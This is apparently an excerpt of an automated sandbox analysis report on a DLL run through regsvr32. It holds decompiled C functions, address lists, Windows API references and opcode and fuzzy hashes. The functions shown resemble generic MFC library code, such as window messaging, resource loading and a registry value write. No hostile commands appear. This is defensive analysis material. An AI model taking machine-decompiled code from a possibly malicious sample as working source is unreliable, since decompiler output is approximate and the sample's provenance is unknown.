				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1003D2BE(_t51);
			}









                                                                                                                0x10025ddd
                                                                                                                0x10025ddd
                                                                                                                0x10025ddd
                                                                                                                0x10025ddd
                                                                                                                0x10025de4
                                                                                                                0x10025de9
                                                                                                                0x10025deb
                                                                                                                0x10025dee
                                                                                                                0x10025df5
                                                                                                                0x10025df8
                                                                                                                0x10025dfb
                                                                                                                0x10025e01
                                                                                                                0x10025e11
                                                                                                                0x10025e03
                                                                                                                0x10025e06
                                                                                                                0x10025e0b
                                                                                                                0x10025e0c
                                                                                                                0x10025e0c
                                                                                                                0x10025e19
                                                                                                                0x10025e1b
                                                                                                                0x10025e1d
                                                                                                                0x10025e1f
                                                                                                                0x10025e1f
                                                                                                                0x10025e1f
                                                                                                                0x10025e24
                                                                                                                0x10025e24
                                                                                                                0x10025e27
                                                                                                                0x10025e2e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10025e30
                                                                                                                0x10025e39
                                                                                                                0x10025e42
                                                                                                                0x10025e45
                                                                                                                0x10025e48
                                                                                                                0x10025e4b
                                                                                                                0x10025e4e
                                                                                                                0x10025e51
                                                                                                                0x10025e54
                                                                                                                0x10025e57
                                                                                                                0x10025e5a
                                                                                                                0x10025e60
                                                                                                                0x10025e63
                                                                                                                0x10025e6a
                                                                                                                0x10025e71
                                                                                                                0x10025e74
                                                                                                                0x10025e7a
                                                                                                                0x10025e80
                                                                                                                0x10025e86
                                                                                                                0x10025e89
                                                                                                                0x10025e8c
                                                                                                                0x10025e92
                                                                                                                0x10025e98
                                                                                                                0x10025e9b
                                                                                                                0x10025e9e
                                                                                                                0x10025eaf

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025DE4
                                                                                                                  • Part of subcall function 10023679: __EH_prolog3.LIBCMT ref: 10023680
                                                                                                                • __strdup.LIBCMT ref: 10025E06
                                                                                                                • GetCurrentThread.KERNEL32(00000004,1000A65A,00000000), ref: 10025E33
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10025E3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                • String ID:
                                                                                                                • API String ID: 4206445780-0
                                                                                                                • Opcode ID: 26b724fd71b170f2f7d93e67b3ca549c0f651ba440e2322baf1848e9fc302bfc
                                                                                                                • Instruction ID: 69c9ff5aae974ac4f189f39486c0ec518028443b1793287df8902fa5d220694b
                                                                                                                • Opcode Fuzzy Hash: 26b724fd71b170f2f7d93e67b3ca549c0f651ba440e2322baf1848e9fc302bfc
                                                                                                                • Instruction Fuzzy Hash: B9219CB4800B509FC721DF3A958124AFBF8FFA4200F50891FE5AA87A22CBB1A540CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002937E Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1002937E(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E10023187(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















                                                                                                                0x10029381
                                                                                                                0x10029383
                                                                                                                0x10029385
                                                                                                                0x10029388
                                                                                                                0x1002938a
                                                                                                                0x1002938c
                                                                                                                0x1002938f
                                                                                                                0x100293c4
                                                                                                                0x100293c6
                                                                                                                0x100293c9
                                                                                                                0x100293d0
                                                                                                                0x100293e2
                                                                                                                0x100293e5
                                                                                                                0x100293ea
                                                                                                                0x100293ea
                                                                                                                0x100293e5
                                                                                                                0x100293f4
                                                                                                                0x100293fe
                                                                                                                0x100293fe
                                                                                                                0x10029404
                                                                                                                0x10029407
                                                                                                                0x1002940b
                                                                                                                0x1002940b
                                                                                                                0x10029396
                                                                                                                0x100293a2
                                                                                                                0x100293aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100293ae
                                                                                                                0x100293b6
                                                                                                                0x100293b9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100293c2
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 100293A2
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 100293AE
                                                                                                                • LockResource.KERNEL32(00000000), ref: 100293BC
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 100293EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 5af04dd84c9b52f8aeeedbf93178655b1a555a9ce55ea9392d42dbc39d498ac5
                                                                                                                • Instruction ID: 9bdba6c0fab6c6351b878234aa9a26aa11921052e12c3a0b54013c632e254e4e
                                                                                                                • Opcode Fuzzy Hash: 5af04dd84c9b52f8aeeedbf93178655b1a555a9ce55ea9392d42dbc39d498ac5
                                                                                                                • Instruction Fuzzy Hash: 9D113675600215EFDB00DFA5D888EAE7BB8EF083A0F408069F905972A0CB75AE00CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003574C Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1003574C(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E1003D5FB( &_v24, 0x10, 0x10058714, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10035706(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1003B437(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                                0x1003574c
                                                                                                                0x10035752
                                                                                                                0x10035759
                                                                                                                0x1003575d
                                                                                                                0x10035761
                                                                                                                0x10035768
                                                                                                                0x1003576b
                                                                                                                0x100357ab
                                                                                                                0x100357bc
                                                                                                                0x1003576d
                                                                                                                0x10035773
                                                                                                                0x10035777
                                                                                                                0x10035785
                                                                                                                0x1003578c
                                                                                                                0x1003578e
                                                                                                                0x10035798
                                                                                                                0x10035798
                                                                                                                0x10035777
                                                                                                                0x100357d0

                                                                                                                APIs
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10035785
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1003578E
                                                                                                                • _swprintf.LIBCMT ref: 100357AB
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 100357BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210924919-0
                                                                                                                • Opcode ID: 2e4dec9075544ce2c900b159fe794254a27153a3eb4fab9f5e1b0bd901e46e0e
                                                                                                                • Instruction ID: 278628be86197373813511e97cf85c016d5c4ca0e1735458447dfde049ff078b
                                                                                                                • Opcode Fuzzy Hash: 2e4dec9075544ce2c900b159fe794254a27153a3eb4fab9f5e1b0bd901e46e0e
                                                                                                                • Instruction Fuzzy Hash: FC01C076900319EFEB11DB649C85FAF73ACEF08715F000419FA01AB191DB74ED0487A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B928 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1001B928(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001A586(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1001B075(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001A586(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x1006c938;
					E1003D2F0( &_v20, 0x1006522c);
					asm("int3");
					_push(4);
					E1003D1E6(E10052A8D, 0, SendMessageA, _t33);
					_t29 = E1002D12C(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E10022AE3(_t29);
					}
					return E1003D2BE(_t24);
				}
			}












                                                                                                                0x1001b928
                                                                                                                0x1001b928
                                                                                                                0x1001b92a
                                                                                                                0x1001b937
                                                                                                                0x1001b939
                                                                                                                0x1001b93b
                                                                                                                0x1001b93d
                                                                                                                0x1001b93d
                                                                                                                0x1001b943
                                                                                                                0x1001b952
                                                                                                                0x1001b95f
                                                                                                                0x1001b964
                                                                                                                0x1001b96b
                                                                                                                0x1001b96f
                                                                                                                0x1001b97d
                                                                                                                0x1001b98a
                                                                                                                0x1001b98f
                                                                                                                0x1001b997
                                                                                                                0x1001b99e
                                                                                                                0x1001b99e
                                                                                                                0x1001b9a3
                                                                                                                0x1001b971
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1001B952
                                                                                                                • SendMessageA.USER32 ref: 1001B97D
                                                                                                                  • Part of subcall function 1001A586: GetTopWindow.USER32(00000000), ref: 1001A594
                                                                                                                • GetCapture.USER32 ref: 1001B98F
                                                                                                                • SendMessageA.USER32 ref: 1001B99E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CaptureWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 729421689-0
                                                                                                                • Opcode ID: 4d4adc2e35d22f34bcda6fa6101d7e1ca48cb6e5af79ee09c4a84cb062d36a12
                                                                                                                • Instruction ID: e059f5d354f908ff1e89d7136182389e86a7ec913ba6c80538b672868ecfcf8e
                                                                                                                • Opcode Fuzzy Hash: 4d4adc2e35d22f34bcda6fa6101d7e1ca48cb6e5af79ee09c4a84cb062d36a12
                                                                                                                • Instruction Fuzzy Hash: 2E0144B13506197FF7216B608CC9FBB76ADEB4C794F010534F3859B1A2DAA19C815960
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039C69 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10039C69(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E100397BC();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E10039B0A(_t46, _t48, 0);
			}








                                                                                                                0x10039c6c
                                                                                                                0x10039c6d
                                                                                                                0x10039c73
                                                                                                                0x10039c7b
                                                                                                                0x10039c87
                                                                                                                0x10039c8a
                                                                                                                0x10039c92
                                                                                                                0x10039c9c
                                                                                                                0x10039ca6
                                                                                                                0x10039cb0
                                                                                                                0x10039cb2
                                                                                                                0x10039cbc
                                                                                                                0x10039cc2
                                                                                                                0x10039cc5
                                                                                                                0x10039ccd
                                                                                                                0x10039cc7
                                                                                                                0x10039cc7
                                                                                                                0x10039cc7
                                                                                                                0x10039cd6
                                                                                                                0x10039ce2

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OffsetRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 177026234-0
                                                                                                                • Opcode ID: 2e2056beeb8fe76e93c7404604ab13c5b5d067ab44eb2e04cbae32d78f31e50b
                                                                                                                • Instruction ID: 3670a64e622dc50f7f85422fa7d49a94d9c61059e2f097a8936201490603247d
                                                                                                                • Opcode Fuzzy Hash: 2e2056beeb8fe76e93c7404604ab13c5b5d067ab44eb2e04cbae32d78f31e50b
                                                                                                                • Instruction Fuzzy Hash: 45110971600609BFDB11DFA9C984D9BBBECEB48654F00492AF54AC7610E670FE409B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10030D58 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E10030D58(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E100231D3( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E10022A6E();
				}
				return 0;
			}







                                                                                                                0x10030d5f
                                                                                                                0x10030d6b
                                                                                                                0x10030d74
                                                                                                                0x10030d97
                                                                                                                0x10030da4
                                                                                                                0x10030d76
                                                                                                                0x10030d81
                                                                                                                0x10030d82
                                                                                                                0x10030d83
                                                                                                                0x10030d84
                                                                                                                0x10030d86
                                                                                                                0x10030db6
                                                                                                                0x10030dcb
                                                                                                                0x10030dcb
                                                                                                                0x10030dd6
                                                                                                                0x10030dd8
                                                                                                                0x10030ddb
                                                                                                                0x10030ddd
                                                                                                                0x10030ddd
                                                                                                                0x10030de5

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3354205298-0
                                                                                                                • Opcode ID: 7d8e716c2ffcb51af5f4d797fe81c5e4c2d07f582eef4b8261ba76b483539626
                                                                                                                • Instruction ID: 3e4e01e0536e414d63cb277ac797077f08545f96e75b9829188728b38b732caa
                                                                                                                • Opcode Fuzzy Hash: 7d8e716c2ffcb51af5f4d797fe81c5e4c2d07f582eef4b8261ba76b483539626
                                                                                                                • Instruction Fuzzy Hash: 0F11C57690011AAFDF01DFA4DC89EDEBBB9FB08305F004061FA05AA115D371AA568BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100205FF Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100205FF(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;
				void* _t35;
				void* _t36;

				_t29 = __edx;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E100160BC(__eflags, 0x10);
				_t38 = _t9;
				if(_t9 == 0) {
					_t31 = 0;
					__eflags = 0;
				} else {
					_t31 = E100205E2(_t9, _t38);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t35 = _t33;
				if(_t13 == 0) {
					if(_t31 != 0) {
						 *((intOrPtr*)( *_t31 + 4))(1);
					}
					L10034CC4(_t23, _t29, _t31, _t35, _t36, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t31 + 4)) = _v8;
				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t31;
			}

















                                                                                                                0x100205ff
                                                                                                                0x10020602
                                                                                                                0x10020607
                                                                                                                0x10020609
                                                                                                                0x1002060e
                                                                                                                0x10020611
                                                                                                                0x1002061e
                                                                                                                0x1002061e
                                                                                                                0x10020613
                                                                                                                0x1002061a
                                                                                                                0x1002061a
                                                                                                                0x10020631
                                                                                                                0x1002063a
                                                                                                                0x10020642
                                                                                                                0x10020643
                                                                                                                0x10020647
                                                                                                                0x1002064f
                                                                                                                0x1002064f
                                                                                                                0x1002065c
                                                                                                                0x1002065c
                                                                                                                0x10020664
                                                                                                                0x1002066a
                                                                                                                0x10020672

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10020631
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10020637
                                                                                                                • DuplicateHandle.KERNEL32 ref: 1002063A
                                                                                                                • GetLastError.KERNEL32(?), ref: 10020655
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3704204646-0
                                                                                                                • Opcode ID: f0855671d130da4307ebdb28cad3a0a7dba719d4943ec5b7bcc1ed41e00b3058
                                                                                                                • Instruction ID: ad1c0d4b6581f717df2baf2ad377bc02e9e26d73043d96e5552e2c124fb605e8
                                                                                                                • Opcode Fuzzy Hash: f0855671d130da4307ebdb28cad3a0a7dba719d4943ec5b7bcc1ed41e00b3058
                                                                                                                • Instruction Fuzzy Hash: 81018F35700304AFEB10DBA5DC8AF5A7BADEF88350F544425F909CB282DBB1EC108B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100391D9 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100391D9(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E1002D888(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E1002D92A(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                                                                                                                0x100391d9
                                                                                                                0x100391de
                                                                                                                0x100391e4
                                                                                                                0x100391e7
                                                                                                                0x100391ea
                                                                                                                0x100391ed
                                                                                                                0x100391f0
                                                                                                                0x100391f6
                                                                                                                0x100391fa
                                                                                                                0x10039204
                                                                                                                0x10039208
                                                                                                                0x1003921f
                                                                                                                0x10039231
                                                                                                                0x10039235
                                                                                                                0x10039244
                                                                                                                0x10039244
                                                                                                                0x10039237
                                                                                                                0x10039238
                                                                                                                0x10039240
                                                                                                                0x10039242
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039242
                                                                                                                0x10039216
                                                                                                                0x10039216
                                                                                                                0x10039216
                                                                                                                0x10039246
                                                                                                                0x10039249

                                                                                                                APIs
                                                                                                                • WindowFromPoint.USER32 ref: 100391F0
                                                                                                                • GetParent.USER32(00000000), ref: 100391FE
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 1003921F
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 10039238
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1871804413-0
                                                                                                                • Opcode ID: 84270237000b18f83030caffc3fae3ed150ba6c8441a5cec9de69d9265afa8ff
                                                                                                                • Instruction ID: ec4f3300151b1357f416a4749fb9b5f57edc85e01cc0252f9785ffbf3cfa21de
                                                                                                                • Opcode Fuzzy Hash: 84270237000b18f83030caffc3fae3ed150ba6c8441a5cec9de69d9265afa8ff
